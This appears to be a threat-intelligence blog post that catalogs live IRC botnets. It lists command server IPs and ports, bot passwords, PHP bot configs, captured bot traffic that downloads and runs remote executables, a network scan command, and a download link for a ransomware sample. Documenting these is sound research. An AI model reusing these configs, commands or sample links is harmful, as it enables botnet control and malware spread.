From Russia with love: another terrible piece of malware.
More info about this shit here: http://www.google.fr/search?hl=fr&q=Trojan+Ransom+%28WinLock%29++&meta=
This version is coded in Delphi.
Download: http://adf.ly/2NFYe
72.20.30.70 (ngrBot hosted in United States Staminus Communications)
Remote Host      Port Number
199.15.234.7     80
59.120.20.43     80
72.20.30.70      7475

PASS ngrBot
NICK n{US|XPa}obsduin
USER obsduin 0 0 :obsduin
JOIN ##cybercenter## ngrBot
JOIN #US
PRIVMSG ##cybercenter## :[DNS]: Blocked 0 domain(s) - Redirected 24 domain(s)

Hosting info: http://whois.domaintools.com/72.20.30.70
x.miners.in (Silent Bitcoin Miner)
Resolved : [x.miners.in] To [66.228.53.52]
Resolved : [x.miners.in] To [66.228.53.5]
Resolved : [x.miners.in] To [66.228.53.56]
Resolved : [x.miners.in] To [66.228.53.55]
Resolved : [x.miners.in] To [173.255.204.19]
Resolved : [x.miners.in] To [96.126.112.223]
Resolved : [x.miners.in] To [96.126.112.23]
Resolved : [x.miners.in] To [173.255.202.228]

ping -n 15 127.0.0.1
taskkill /f /im cgminer.exe
taskkill /f /im svchoost.exe
taskkill /f /im
Sabukenke.com (ngrBot hosted in Germany Rapidswitch Ltd)
Resolved : [Sabukenke.com] To [78.129.229.120]

Remote Host        Port Number
199.115.229.186    80
199.15.234.7       80
78.129.229.120     7777

PASS laekin0505x
NICK n{US|XPa}zcmlqxw
USER zcmlqxw 0 0 :zcmlqxw
JOIN #totalrenovation2011 ngrBot
PRIVMSG #totalrenovation2011 :[d="http://199.115.229.186/~cirrus13/1100New.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Mcxaxm.exe" - Download retries: 0

Hosting info: http://whois.domaintools.com/78.129.229.120
slics2.geeksX.us [Crew] (ngrBot hosted in France Paris Gandi)
Remote Host      Port Number
199.15.234.7     80
92.243.5.149     33333

PASS ngrBot

Channels: #3new#

Hosting info: http://whois.domaintools.com/92.243.5.149
64.31.60.72 (600 linux bots hosted in United States Limestone Networks Inc)
var $config = array("server"=>"64.31.60.72",
                    "port"=>"4085",
                    "pass"=>"",
                    "prefix"=>"BOTNET",
                    "maxrand"=>"3",
                    "chan"=>"#cp",
                    "chan2"=>"#cp",
                    "key"=>"123456",
                    "modes"=>"+p",
                    "password"=>"123",
                    "trigger"=>".",
                    "hostauth"=>"*"

Local users: Current Local Users: 272 Max: 1018
Global users: Current Global Users: 272 Max: 633

Hosting info: http://whois.domaintools.com/64.31.60.72
Branthu.no-ip.biz (linux bots hosted in Canada Toronto Wyzdom Technologies Inc)
var $config = array("server"=>"Branthu.no-ip.biz",
                    "port"=>7000,
                    "pass"=>"", // server password
                    "prefix"=>"xpl0",
                    "maxrand"=>8,
                    "chan"=>"#x",
                    "key"=>"123", // channel password
                    "modes"=>"+p",
                    "password"=>"qwerty", // bot password
                    "trigger"=>".",
                    "hostauth"=>"*"

Resolved : [Branthu.no-ip.biz] To [64.34.138.125]

Hosting info: http://whois.domaintools.com/64.34.138.125
74.82.57.207 (ngrBot hosted in United States San Jose Neosurge)
Remote Host        Port Number
199.101.133.137    80
199.15.234.7       80
74.82.57.207       1888

PASS ngrBot
NICK n{US|XPa}msujxop
USER msujxop 0 0 :msujxop
JOIN ##center 1963.g3rb3rs1t0.3691
JOIN #XP
JOIN #US
PRIVMSG #XP :[d="http://dc380.4shared.com/download/qjRbLPFo/gtdtduf.exe" s="81920 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.exe" - Download retries: 0

Hosting info: http://whois.domaintools.com/74.82.57.207
65.12.196.205 (Dbot hosted in United States Ft. Lauderdale Bellsouth.net Inc)
Remote Host       Port Number
65.12.196.205     8004

JOIN ##click## click
PRIVMSG ##click## :Scanning: 99.x.x.x, 99 threads. Using CFTP.
PONG us.undernet.org.org

Now talking in ##click##
Topic On: [ ##click## ] [ .scan 99 1 y 2 2 99.x.x.x ]
Topic By: [ Ccc ]
Modes On: [ ##click## ] [ +smntMuk click ]

Hosting info: http://whois.domaintools.com/65.12.196.205
219.238.253.143 (irc bot hosted in China Beijing Beijing Guang Bo Xue Yuan Co.ltd)
Remote Host         Port Number
219.238.253.143     4244

NICK new[iRooT-XP-USA]288239
USER 2882 "" "TsGh" :2882
JOIN #!G!# as
PONG :irc.akanska.org

Hosting info: http://whois.domaintools.com/219.238.253.143